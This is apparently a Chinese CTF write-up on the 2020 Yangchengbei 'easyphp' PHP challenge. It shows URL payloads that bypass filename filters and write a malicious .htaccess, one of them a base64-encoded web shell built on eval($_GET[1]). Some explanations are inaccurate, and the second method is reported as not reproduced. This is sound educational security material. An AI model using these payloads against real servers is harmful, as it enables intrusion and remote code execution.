[羊城杯2020]easyphp 一些思考

方法一

1.通过file_put_contents函数来写入木马
2绕过preg_match函数（文件名必须只能带有[a-z.]范围的字符）和stristr函数（通过换行符来进行绕过）

我们可以直接往.hatccess文件中写入木马（机会只有一次）‘
因为.hatccess这个文件会自己绕过preg_match函数。

所有写入的内容如下

php_value auto_prepend_fil\ 
e .htaccess 
#\ 

payload

?content=php_value%20auto_prepend_fil\%0ae%20.htaccess%0a%23\&filename=.htaccess

下面来解释一下
php_value auto_prepend_file 是用来在页面底部加载文件的
这也是为什么我们要去写入#\ 在文件底部
而#应该是.hatccess文件特有的写入形式，没有的话会直接报错500

最后那个/是用来转意换行符的

可以看出在文件最后有一个换行符，如果不进行转义，那么他真正写入的情况是这个样子

php_value auto_prepend_fil\ 
e .htaccess 
#\ 
Hello, world

而文件最后的Hello,world会对文件照常影响,不符合写入格式，进而无法解析。

总结：1.strstr函数用换行符进行绕过。
为什么说机会只有一次，因为他会自动删除根目录下所有除了index.php的所有文件，写入成功时，你不刷新，可以看到flag，但是一旦刷新，文件就没有了，所以写入成功也只能刷新一次。

方法二

查阅资料了解到如何绕过preg_match函数
1数组绕过，因为preg_match处理数组会返回NULL,然而这里的伪协议php://filter很明显不支持绕过
2过正则匹配的递归次数来绕过，正则匹配的递归次数由pcre.backtrack_limit参数来控制
要让preg_match返回false，也就是匹配不到，即可绕过preg_match。就是通过设置pcre.backtrack_limit值为0，使得回溯次数为0，来使得正则匹配什么都不匹配，即返回false。
测试一下，是否能绕过preg_match：

成功绕过preg_match。

之后写入成功后
payload

?filename=php://filter/write=convert.base64-decode/resource=.htaccess&content=cGhwX3ZhbHVlIHBjcmUuYmFja3RyYWNrX2xpbWl0IDAKcGhwX3ZhbHVlIHBjcmUuaml0IDAKcGhwX3ZhbHVlIGF1dG9fcHJlcGVuZF9maWxlIC5odGFjY2VzcwojYTw/cGhwIGV2YWwoJF9HRVRbMV0pOyA/Plw=&1=phpinfo();

但是并没有复现成功可能是因为权限问题。